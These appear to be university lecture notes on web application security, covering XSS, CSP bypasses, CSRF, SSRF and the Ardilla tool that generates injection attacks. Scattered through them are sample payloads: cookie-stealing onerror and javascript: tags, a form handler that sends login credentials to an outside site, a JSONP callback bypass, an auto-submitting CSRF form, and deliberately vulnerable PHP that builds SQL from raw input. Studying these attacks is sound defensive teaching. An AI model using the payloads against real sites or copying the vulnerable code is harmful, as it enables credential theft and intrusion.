I. Web Application Security
 A. Goal
------------------------------------------
       GOALS OF WEB SECURITY

Confidentiality:
  - No unwanted information disclosure
       by browsing web

Isolation:
  - Site A cannot interfere with
        session browsing site B




Web app security:
  - Apps on web can achieve same security
       as on desktop
------------------------------------------
        What does the first goal mean about user behavior?
        What would be one way to formalize (or check) the second goal?
        What does it mean for one site to interfere with a session
           browsing another site?
 B. threat model
------------------------------------------
        WEB ATTACKER THREAT MODEL

Attacker can:

  - controls website (attacker.com)
  - can obtain SSL/TLS certificate(s)

However, attacker does NOT:

  - control network

------------------------------------------
        What does controlling a website mean from the user's viewpoint?
        What would a web-based attacker want to do?
  1. focus
------------------------------------------
        FOCUS NOT ON  WEB MALWARE

Web malware (exploiting browsers):

     - trojans
     - adware
     (called "drive-by-downloads")

  - control as in our previous study
  - but NOT our focus now

Instead:

  - we now focus on the web attacks
       that are specific to the web
------------------------------------------
------------------------------------------
          OUR FOCUS

Web-based attacks,
  not attacks on browsers themselves

Examples:

 - Cross-site Scripting (XSS)
 - SQL injection
 - Cross-site Request Forgery (CSRF)
------------------------------------------
        Are XSS and CSRF important kinds of attacks?
 C. background
  1. URLs
------------------------------------------
           URL

  http://columbia.edu:80/class?name=4995#h
  ^      ^            ^ ^     ^          ^
  |      |            ^ \path \query     |
  |      \host name   \port              |
  protocol                        fragment

Special characters are encoded as
 hexadecimal escapes (e.g.):

   - %0A = newline
   - %20 = space

------------------------------------------
  2. HTTP
   a. requests
------------------------------------------
             HTTP REQUESTS

Method File name version
 |        |       |
 v        v       v

GET /index.html HTTP/1.1
Accept: image/gif, image/x-bitmap,
                          image/jpeg, */*
Accept-Language: en
Connection: Keep-Alive
        User-Agent: Mozilla/1.22
        (compatible; MSIE 2.0; Windows 95)
Host: www.example.com
Referer: http://www.google.com?q=dingbats
                <- Blank line
                <- Data (none)
------------------------------------------
        Is this any different in HTTPS?
        Does HTTPS guarantee that the browser and server can trust
            each other?
        What is the difference between GET and POST?
   b. response
------------------------------------------
              HTTP RESPONSE

Protocol Status  Reason phrase
  |      Code    /
  |       |     /
  v       v    v 

HTTP/1.1 200 OK
Date: Thu, 24 Jul 2008 17:36:27 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
                            <-- Blank line
<html> ... data ... </html>
------------------------------------------
      Does the data need to be HTML?
      Could the response redirect the browser to another URL?
   c. Browser execution model
------------------------------------------
     BASIC BROWSER EXECUTION MODEL
     
Loop for each window/tab/frame:
  - Load content
  - Render content
  - Processes HTML and scripts, possibly:
     - display images
     - recursively process subframes
  - Respond to events, which may be:
     - user actions (OnClick, OnMouseover)
     - rendering (OnLoad, OnBeforeUnload)
     - timing: (setTimeout, clearTimeout)

------------------------------------------
------------------------------------------
              EXAMPLE WEBPAGE

Adapted from:
 http://www.w3schools.com/js/js_output.asp

<!DOCTYPE html>
<html lang="en">
<meta http-equiv="Content-Type"
      content="text/html; charset=utf-8">
<title>My First Web Page</title>
<body>
<button type="button"
  onclick="document.write(5 + 6)">
  Try it</button>
</body>
</html>

------------------------------------------
  How would this execute?
   d. Document-Object Model (DOM)
------------------------------------------
     DOCUMENT-OBJECT MODEL (DOM)

- API for web pages

- Web pages are hierarchically-structured
   data

  Property examples:
     document.alinkColor
     document.URL
     document.forms[]
     document.links[]
     document.anchors[]
     ...

  Methods:
     document.write()
     ...

DOM includes Browser-Object Model (BOM):
   window, document, frames[], history
   location, navigator

------------------------------------------
        Have you used this before in Javascript?
------------------------------------------
    CHANGING THE HTML USING JAVASCRIPT

Examples of Javascript methods
  that can change HTML:

 - createElement(elementName)
 - createTextNode(text)
 - appendChild(newChild)
 - removeChild(node)
------------------------------------------
        Could Javascript be used to add a new list item to a
        displayed list?
 D. isolation of web sessions
------------------------------------------
         FRAMES and IFRAMES

Frames are HTML elements

Uses of frames:
 - delegate screen area to another source
 - isolation from browser, so
    parent may work even if frame broken

Kinds of frames:
  - Frame: rigid division of webpage
  - iFrame: floating inline frame
------------------------------------------
        What webpages have you seen that use frames?
   a. browser is analogous to OS
------------------------------------------
          BROWSER ACTS LIKE OS

OS                   WEB BROWSER          
                     
Data:                Data:                
 - Files              - Cookies           
                     
Operations:          Operations:          
 - System calls       - DOM                 
                     
Actor:               Actor:               
 - Process            - Frame             
                     
Principal:           Principal:           
 - User               - Origin            
                     
Access control:      Access control:      
 - mandatory          - discretionary     

Vulnerabilities:     Vulnerabilities:
 - buffer overflow    - XSS
 - elev. of priv.     - CSRF
 - CPU cache hist.    - Cache history

------------------------------------------
 E. revisiting the goals
------------------------------------------
            MORE SPECIFIC GOALS

Each frame has an origin
    protocol://host:port

Associate data with an origin

Policy:



------------------------------------------
        Does an origin really correspond to an individual person?
        What would be a concrete example of an origin?
        What would be a good way to use origins and frames to
            formalize isolation?
 F. attacks
------------------------------------------
           ATTACK OVERVIEW

OWASP Top 10:

2013 2021
 4.  1.   Broken access control
 1.  3.   Injection and XSS
 2.  7.   Broken authentication

    10.   SSRF








------------------------------------------
        What is broken access control?
II. Cross-site Scripting (XSS) Attacks and Defenses
------------------------------------------
         Cross-site Scripting (XSS)

Attack:
 - Injects malicious script
    into trusted context

Attacker's goal:
 - Steal information from honest website
------------------------------------------
        What kind of threat is the attacker posing?
 A. type 1 attacks (non-persistent)
------------------------------------------
   CROSS-SITE SCRIPTING (XSS), TYPE 1

Attack idea:

 1. Design URL containing malicious script

 2. Get user to click on that URL

 3. Web server puts the script on web page
    that is rendered on the user's browser

 4. The user's browser
    runs the malicious script


In JSP:
  <%= request.getParameter("Name") %>

In Ruby on Rails:

   <%= comment.body %>
------------------------------------------
      How do you get step 2 to work?
      Why doesn't the attacker run the script themselves?
      What role does the web server play in this?
      What threats are served by this attack?
  1. example
------------------------------------------
   EXAMPLE XSS ATTACK, PAYPAL (2006)

1. Attackers contacted users via email

2. Fooled them into accessing URL
   hosted on the legitimate PayPal website

3. Injected code redirected PayPal
   visitors to a page warning users
   their accounts had been compromised

4. Victims were redirected to a phishing
   site and prompted to enter sensitive
   financial data. 
------------------------------------------
 B. type 2, persistent xss attacks
------------------------------------------
        STORED XSS ATTACKS (TYPE 2)

Like type 1, but the malicious query is
 stored by the server

 1. Send input containing malicious script
      to the server, which stores it

 2. Get user to browse that web site

 3. Web server puts the script on web page
    that is rendered on the user's browser 

 4. The browser runs the malicious script


------------------------------------------
       What kinds of web sites store user input and show it to others?
       Is there social engineering necessary to make this work?
  1. example, stored images
------------------------------------------
      STORED IMAGE ATTACK

Can a JPEG contain HTML?

  Yes, if request for site.com/pic.jpg
  results in:

    HTTP/1.1  200 OK
    ...
    Content-Type: image/jpeg
    <html>  fooled ya   </html>

Some browsers would render the HTML

------------------------------------------
   Consider a photo-sharing site that allows users to upload
   images, could this result in XSS attacks?
  2. example, PDF viewer feature
------------------------------------------
          PDF VIEWER ATTACK

Adobe PDF viewer (vers. 7.9 and earlier)

 - Viewer would execute JavaScript
    in URLs such as:
       http://path/to/pdf/
        file.pdf#name=javascript:code_here

 - JavaScript executed in context of
   domain where PDF file is hosted

Attack:
 1. Find PDF file on website.com
 2. Create URL with JavaScript
    http://website.com/path/to/
     file.pdf#s=javascript:alert("xss");
 3. Get victim to click on link
 4. Reader plugin would execute
    the JavaScript
------------------------------------------
        What could the JavaScript do?
        Could this affect your local computer?
 C. response splitting
------------------------------------------
          RESPONSE SPLITTING

Puts malicous script in HTTP headers

In Ruby on Rails:

   redirect_to(url)
------------------------------------------
        What's the problem with the rails code?
 D. Summary of XSS attacks
    What mistake is made by the developers that premits XSS attacks?
    What can be done to prevent the attack?
    What kind of tool could catch the bad code involved?
 E. mitigation of XSS attacks
------------------------------------------
     MITIGATING XSS ATTACKS

What can be done to stop XSS attacks?










------------------------------------------
  1. use caution in filtering
------------------------------------------
  CAUTION: SCRIPTS NOT ONLY IN <SCRIPT>s

- JavaScript as scheme in URI
  <img src=
      javascript:alert(document.cookie);>
- JavaScript On{event} attributes/handlers
- OnSubmit, OnError, OnLoad, etc.:
   
      <img src="none"
        OnError="alert(document.cookie)">

      <iframe src=`https://bank.com/login`
              onload=`steal()`>

      <form> action="logon.jsp"
             method="post"
             onsubmit="hackImg=new
             Image;     hackImg.src=
             'http://www.digicrime.com/'
             +document.for
                ms(1).login.value'+':'+
                 document.forms(1)
                  .password.value;"
      </form>
------------------------------------------
  2. tools
------------------------------------------
    TOOL TO HELP MITIGATE XSS ATTACKS


What kinds of tools would help?







------------------------------------------
        What kinds of tools could help prevent XSS attacks?
------------------------------------------
  EXISTING TOOLS TO MITIGATE XSS ATTACKS

What tools are available?





------------------------------------------
  3. summary for mitigating XSS attacks
------------------------------------------
       SUMMARY FOR MITIGATING XSS

Key concepts:

 - Allow lists

 - Output encoding

 - Validate input before storing in DB


 - Dynamic vs. static defense techniques


Good ideas:
 - Static analysis (e.g. in ASP.NET)
 - Taint tracking
 - Framework support
 - Continuous testing

Bad ideas:
 - Deny lists
 - Manual sanitization code
 
------------------------------------------
        Why would an allow list be better than disallowing certain URLs?
        Is there a way to encode HTML to prevent it from being
        interpreted as active content?
        Why would it be better to fix a simple page character
            instead of checking inputs for attacks?
        What would it be better to validate input before storing in DB?
        Is it okay for a "page not found" (404 error) page to show
           the URL of the page that was not found?
  4. content security policies
------------------------------------------
     CONTENT SECURITY POLICY

Set a content security policy
in the response header:

 Content-Security-Policy:
   script-src 'self'
   https://apis.google.com

Can set it in <meta> tag:

 <meta
  http-equiv="Content-Security-Policy"
  content="default-src 'self';
  img-src https://*;
  child-src 'none';">
------------------------------------------
   a. Do CSPs work to mitigate XSS attacks?
------------------------------------------
      PRACTICAL LIMITS OF CSP
      
Based on:
 Lukas Weichselbaum, Michele Spagnuolo,
 Sebastian Lekies, and Artur Janc.
 CSP Is Dead, Long Live CSP!
 On the Insecurity of Whitelists and
 the Future of Content Security Policy.
 In CCS '16, ACM, NY,  pp. 1376--1387.
 https://doi.org/10.1145/2976749.2978363

Contributions:
 - Internet-wide study of CSP usage
 - Security analysis of CSP
    and 3 common ways CSP can be bypassed
 - 94.68% of CSP policies
   are ineffective at preventing XSS
 - propose mechanisms that should be:
     - more secure
     - more usable
------------------------------------------
    i. Idea of CSP
------------------------------------------
        RECAP: HOW CSP SHOULD WORK

1. disallow inline scripts

2. allow only trusted domains as sources
   for scripts

Why should that work?






------------------------------------------
     Why should CSP work?
    ii. Is CSP practical?
------------------------------------------
         IS THE IDEA PRACTICAL?

To protect against XSS attacks,
 policy must contain
   - script-src and
   - object-src
whitelists and must prohibit:
   - use of eval()
   - inline event handlers
   - URIs of form javascript:...

What could be some practical problems?











------------------------------------------
       Why must a CSP have those properties listed?
       What could happen if an attacker can execute a script?
------------------------------------------
         RESULTS OF STUDY






------------------------------------------
    iii. Bypassing CSP protections
------------------------------------------
    JAVASCRIPT WITH DYNAMIC CALLBACKS

JSONP interfaces
 wrap a JavaScript object
 in a callback function
 to allow the loading of API data,

<script
  src="/path/jsonp?
    callback=alert(document.domain)//">
</script>

/* API response */
 alert(document.domain);

------------------------------------------
      Can an attacker use a JSONP interface to execute arbitrary JavaScript?
------------------------------------------
           REFLECTION

What does this JavaScript do?

 var array =
      document
       .getElementById('cmd')
                        .value.split(',');
 window[array[0]]
       .apply(this, array.slice(1));





Is it dangereous if the attacker controls
   the value of cmd?


------------------------------------------
------------------------------------------
        DYNAMIC CODE FROM ANGULAR.JS

What does this script do?

<script src="whitelisted.com/angular.js">
</script>
<div ng-app>{{ 1000 - 1 }}</div>



Is it dangerous if such a script gets data
  from the DOM?




Does Angular use eval()?


Angular also has a CSP-compatability mode
  (ng-csp) that interprets scripts
  for itself

 Can that mode bypass CSP restrictions?



Does the app need to use Angular
 to be attacked?
 

------------------------------------------
     Does angular use eval()?
     Can Angular's CSP-compatability mode bypass CSP restrictions?
     Does the app need to use Angular to be attacked?
------------------------------------------
  DATA OFTEN INTERPRETED AS JAVASCRIPT

Web browsers interpret JavaScript
  everywhere:

CSV data:

  Name,Value
  alert(1),234

Error messages that echo arguments:

  Error: alert(1)// not found.

User file uploads

------------------------------------------
        When would a user file upload cause trouble?
        Do these problems affect an app if a trusted source of
           scripts has such problems?
    iv. Path restriction policies
------------------------------------------
    CSP2 ALLOWS PATHS IN A WHITELIST

Content-Security-Policy:
  script-src example.org
  parially-trusted.org/foo/bar.js

Does this respect privacy? 


Is this easy to maintain?



So, CSP2 allows redirects
Is allowing a redirect secure?



------------------------------------------
        Do paths in CSPs respect privacy?
        Do paths in CSPs help or hurt maintenance?
        Are redirects safe?
   b. study results
------------------------------------------
        RESULTS OF STUDY

From Weichselbaum et al. (CCS'16),
  section 3

Data: all web pages


------------------------------------------
    i. How CSP is used in practice
------------------------------------------
        USE IN PRACTICE

Only 3.7% of web pages had a CSP

Policies that can be bypassed:

 - using unsafe-inline
 - missing object-src
 - use of wildcards in whitelists
 - unsafe origin in whitelist
     contains JSONP or angular.js

In practice use of:
  unsafe-inline   87.26%
  unsafe-eval     81.65%
  wildcards       about 70%
  unsafe origins  about 50%

------------------------------------------
      What do these data tell us?
   c. improvements to CSP
------------------------------------------
         IMPROVEMENTS PROPOSAL

In the Weichselbaum et al. (CCS'16) paper
  section 4

- Don't rely on whitelists
- Use nonces, from inline (static) sources

Content-Security-Policy:
   script-src 'nonce-random123'
   default-src 'none'

<script nonce="random123"
    src="https://example.org/script.js?
         callback=foo">
</script>

------------------------------------------
        What is a nonce?
        How does that help?
------------------------------------------
       HOW TO ALLOW DYNAMIC SCRIPTS?

JavaScript libraries often use dynamically
  created scripts
How can these scripts get the right nonce?

With script-src script-dynamic

   - nonce inherited by scripts
      created by trusted scripts


This works on several apps
  e.g., Google Maps
   

------------------------------------------
        How can dynamically created scripts get the right nonce?
   d. evaluation
------------------------------------------
       LIMITATIONS OF THE PROPOSAL

Of the Weichselbaum et al. (CCS'16) paper

- XSS can occur
  if attacker can inject URL
  used to dynamically create script

- injections into scripts with nonces
  will allow unrestricted code


------------------------------------------
------------------------------------------
            COMPATABILITY

Need to rewrite code that uses:

   - document.write() to add scripts
       instead:
         - pass nonce, or
         - use createElement()

   - inline event handlers

   - URIs of the form javascript:...

------------------------------------------
   e. Summary
------------------------------------------
            SUMMARY

Of the Weichselbaum et al. (CCS'16) paper

- CSP is insecure in practice
   due to whitelists

- nonce-based CSP would be better


------------------------------------------
III. Cross-Site Request Forgery (CSRF or XSRF)
 A. background on the attack
  1. use of cookies for authentication
------------------------------------------
          SESSIONS USING COOKIES

 Browser             Server
   []   POST/login.cgi []
   [] ---------------->[]
   []                  []
   [] set-cookie: authenticator
   [] <--------------- []
   []                  []
   [] GET: Cookie: authenticator
   []----------------> []
   []                  []
   []    response      []
   [] <--------------- []
------------------------------------------
  2. example of attack
------------------------------------------
     ATTACK EXAMPLE

1. User logs in to  bank.com
    - Session cookie remains in browser

2. User visits another site with
   <form  name=F
    action=http://bank.com/BillPay.php>
   <input name=recipient value=badguy> ...
   <script> document.F.submit(); </script>

3. Browser sends user auth cookie
    with form submission

4. Transaction will be fulfilled

Problem:


------------------------------------------
      Why is the transaction fulfilled?
      Is the attacker's page/script part of the original session?
      Do you ever stay logged in to a website while browsing?
------------------------------------------
      HTML TAGS USED IN CSRF ATTACKS

from Kombade and Meshram 2012 (table 1):

Tag     Exploit example
========================================

body    <body {background:url("attack")}>
        <body onload="attack">

img     <img src="attack">

input   <input type="image" src="attack"
            alt="Submit">

link    <link rel=".." type="text/css"
              href="attack">

table   <table background="attack">

iframe  <iframe src="attack">

        ...
------------------------------------------
        Which does the user need to click on?
 B. defenses against CSRF
------------------------------------------
         DEFENSES AGAINST CSRF

















------------------------------------------
     How can CSRF be prevented?
------------------------------------------
   VARIATIONS ON SECRET TOKEN VALIDATION

 - Session identifier
 - Session-independent token
 - Session-dependent token
 - HMAC of session identifier
 
------------------------------------------
------------------------------------------
       WHY NOT VALIDATE REFERER/ORIGIN?

Why might a website not validate referer?










How is origin in header better?






------------------------------------------
     Why might a website not want to validate referers?
     Can a website afford to turn away customers with missing referers?
     How is origin header better than referer for privacy?
     Would taint checking help prevent CSRF?
 C. Server-side Request Forgery (SSRF)
------------------------------------------
   SERVER-SIDE REQUEST FORGERY (SSRF)

#10 in the 2021 OWASP Top Ten
  (A10:2021)

Occurs when website designed to use 
  query strings in URLs to 
  represent requests by client

e.g., in email app:

  http://ex.com/request.php?create-new
  http://ex.com/request.php?read-NNN
  http://ex.com/request.php?delete-NNN



------------------------------------------
     Why is that design a problem?
     Is SSRF the result of bad design or bad coding?
     How can SSRF be prevented?
     Is this the same problem as CSRF?
IV. Detecting and Preventing SQL injection and XSS attacks
 A. goal/problem
------------------------------------------
  DETECTING SQL INJECTION AND XSS ATTACKS

Based on paper

Adam Kieyzun, Philip J. Guo,
Karthick Jayaraman, and Michael D. Ernst.
Automatic creation of SQL Injection and
cross-site scripting attacks.
In ICSE '09. IEEE Computer Society, USA,
pp. 199--209, 2009.
https://doi.org/10.1109/ICSE.2009.5070521

Goal:

  Automatically expose SQL injection
  and XSS vulnerabilities in code

Claims:
  - create real attack vectors
  - few false positives
  - no runtime overhead
  - handles dynamic code,
     i.e., PHP code

  = handles type 2 XSS attacks


------------------------------------------
     What is a type 2 XSS attack?
 B. Approach
------------------------------------------
Approach:
 - Automatically generate inputs
 - Dynamically track taint
 - Mutate inputs to produce exploits


------------------------------------------
        Is this a static or dynamic approach?
 C. Background
------------------------------------------
           PHP WEB APPLICATIONS

 $_GET[]  --->  [  PHP ]
                [  WEB ] -->  HTML page
 $_PUT[]  --->  [  APP ]


  Browser --->  [ Server  ] --SQL-> | 
                [ running ]         | DBMS
   HTML   <---  [ PHP     ] <-Data- |




------------------------------------------
  1. example
------------------------------------------
     EXAMPLE: BULLETIN BOARD (p. 201)

function addMessageForTopic() {
  if (!isset($_GET['msg']) ||
      !isset($_GET['topicid']) ||
      !isset($_GET['poster'])) {
    exit;
  }
  
  $my_msg = $_GET['msg'];
  $my_topicid = $_GET['topicid'];
  $my_poster = $_GET['poster'];
  
  //construct SQL statement
  $sqlstmt = "INSERT INTO messages
        VALUES('$my_msg','$my_topicid')";
  
  //store message in database
  $result = mysql_query($sqlstmt);
  echo "Thank you, $my_poster";
}

What if addMessageForTopic is called with:

  mode == add
  topicid == 1
  msg == '<script>alert("XSS")</script>'
  poster == Villain



------------------------------------------
        What happens in that case?
        Is there a type 1 or type 2 XSS attack?
        What's the output in this case?
        Could this program have a type 1 XSS attack?
------------------------------------------
      TYPE 2 (STORED) XSS ATTACK

$_GET[] is:

  mode == add
  topicid == 1
  msg == '<script>alert("XSS")</script>'
  poster == Villain

 ~~>

addMessageForTopic()

 ~~>

Database System



------------------------------------------
        What does the DBMS store for the message?
        Does the attacker need to do anything to get users to
           execute the script?
 D. Ardilla system architecture
------------------------------------------
          ARDILLA SYSTEM OVERVIEW

     -> [ Input Generator  ]
    /
PHP                                DB
Source->[ Taint Propagator ] <-->  +
Code                             Taint
    \                            Tracking
     \->[ Attack Generator ]
        [  / Checker       ]

     overall output:
          malicious inputs
           causing XSS attacks
------------------------------------------
  1. input generation via concolic execution
------------------------------------------
  INPUT GENERATION VIA CONCOLIC EXECUTION

For this code:

if($_GET['mode'] == "add")
  addMessageForTopic();
else if($_GET['mode'] == "display")
  displayAllMessagesForTopic();
else
  exit;

Example inputs:

  mode == add
  topicid == "1"
  msg == "1"
  poster == "1"

Where does that lead?
What would be the PC?
What could be the next example?





And then?
   

------------------------------------------
   How does concolic execution proceed?
  2. taint tracking
------------------------------------------
            SENSITIVE SINKS

For SQL injection attack detection:

    mysql_query()

For XSS:

    echo(),
    print()


------------------------------------------
------------------------------------------
              TAINT SETS

Track taint set for each value:

  set of variables that may influence it

  e.g., after

    $my_msg = $_GET['msg'];

  the taint set of $my_msg is:


      
------------------------------------------
      How would the program represent an untainted value?
      What would be the taint set of the value of $_GET['msg']?
      What would be the taint after concatenating two values?
      What would be the taint set of the result of a sanitizing
         function?
      What would be the taint set after chopping off whitespace
         from the end of a string value?
------------------------------------------
   BUILDING THE TAINT PROPOGATION CODE

"implemented by modifying the Zend PHP
interpreter"
     -- p. 204


------------------------------------------
      Why modify a PHP interpreter?
  3. Attack Generation and Checking
------------------------------------------
      ATTACK GENERATION

 1. Find PC leading to a sensitive sink

 2. For each such PC:
      Replace each tainted input string
      with possible attack string



------------------------------------------
        What else could be done in step 2?
        Why do this (only) when reaching a sensitive sink?
------------------------------------------
         ATTACK CHECKING

Report XSS attack only if:






------------------------------------------
       Why is that the right thing to check?
       What should be checked for SQL injection attacks?
       What would happen in the bulletin board example?
  4. Concrete and symbolic database
------------------------------------------
   CONCRETE AND SYMBOLIC DATABASE

Goal:
 - find stored type 2 XSS attacks
 

Approach:

 - store values + taint information
      as 



Example:

  msg   topicid   msg_s    topicid_s
======================================
"Test"     1      {}       {}
"Attack"   2      {msg}    {topic}


Tracking symbolic state:

  - dynamically rewrite SQL to
       read or write taint sets
   
------------------------------------------
        What are some SQL statements that would need rewriting?
        What would be involved in the rewrite?
------------------------------------------
    FINDING TYPE 2 XSS ATTACKS

 let P be a program
     db be database state

 attacks := {}
 dbsym := makeSymbolicCopy(db)
while not timeExpired() do
{
 inputs := inputs + generateNewInput(P)
 input1 := pickInput(inputs)
 input2 := pickInput(inputs)
 (taints1,dbsym1) := exec(P,input1,dbsym)
 (taints2,dbsym2) := exec(P,input2,dbsym1)
 attacks := attacks
      + checkAttacks(taints2,
                     P,(input1,input2))
}
return attacks
------------------------------------------
        What should generateNewInput(P) do?
        Why are two inputs needed?
        Should there be any link between input1 and input2?
        What should checkAttacks do?
------------------------------------------
  EXAMPLE OF A TYPE 2 ATTACK GENERATION

input1 is

   $_GETS['mode'] == 'add'
   $_GETS['topicid'] == 1
   $_GETS['msg'] == 1
   $_GETS['poster'] == 1
   
input2 is

   $_GETS['mode'] == 'display'
   $_GETS['topicid'] == 1

Running input1 puts in database:

   msg == 1,
   topicid == 1,
   msg_s == {msg},
   topicid_s == {topicid}

Running input2

   retrieves msg from database
     with msg_s == {msg}

   sends value of msg to echo()
   
Use an attack pattern to alter
input1's msg to:

   msg == 
   "<script>alert("XSS")</script>"

Run program on altered input1 and input2

   See that a script gets into output

------------------------------------------
        What is special about echo?
        What does sequence tell us?
  5. evaluation
------------------------------------------
           EVALUATION

On 4 open source programs:

Program       Source Size
=========================
schoolmate    8181 LOC
webchess      4722 LOC
faqforge      1712 LOC
EVE            915 LOC
geccbblite     326 LOC


Program       Type      Vuln.   False Pos
=========================================
schoolmate    XSS1       10         0
schoolmate    XSS2        2         0

webchess      XSS1       13         0
              XSS2        0         0
              
faqforge      XSS1        4         0
              XSS2        0         0
              
EVE           XSS1        2         0
              XSS2        2         0
              
geccbblite    XSS1        0         0
              XSS2        4         0
=========================================
Total         XSS1       29         0
              XSS2        8         0

------------------------------------------
  6. Vs. other approaches
------------------------------------------
   COMPARISON WITH OTHER APPROACHES

Defensive coding:
 + can completely prevent attacks,
     if done properly
 - must re-write existing code

Static analysis:
 + could prove absence of errors
 - false positives,
 - doesn't produce concrete attacks

Dynamic monitoring:
 + can prevent all attacks
 - runtime overhead
 - false positives affect app. behavior

Random fuzzing:
 + easy to use,
 + produces concrete attacks
 - creates mostly invalid inputs
------------------------------------------
        Is there a way to know if defensive coding is
           "done properly"?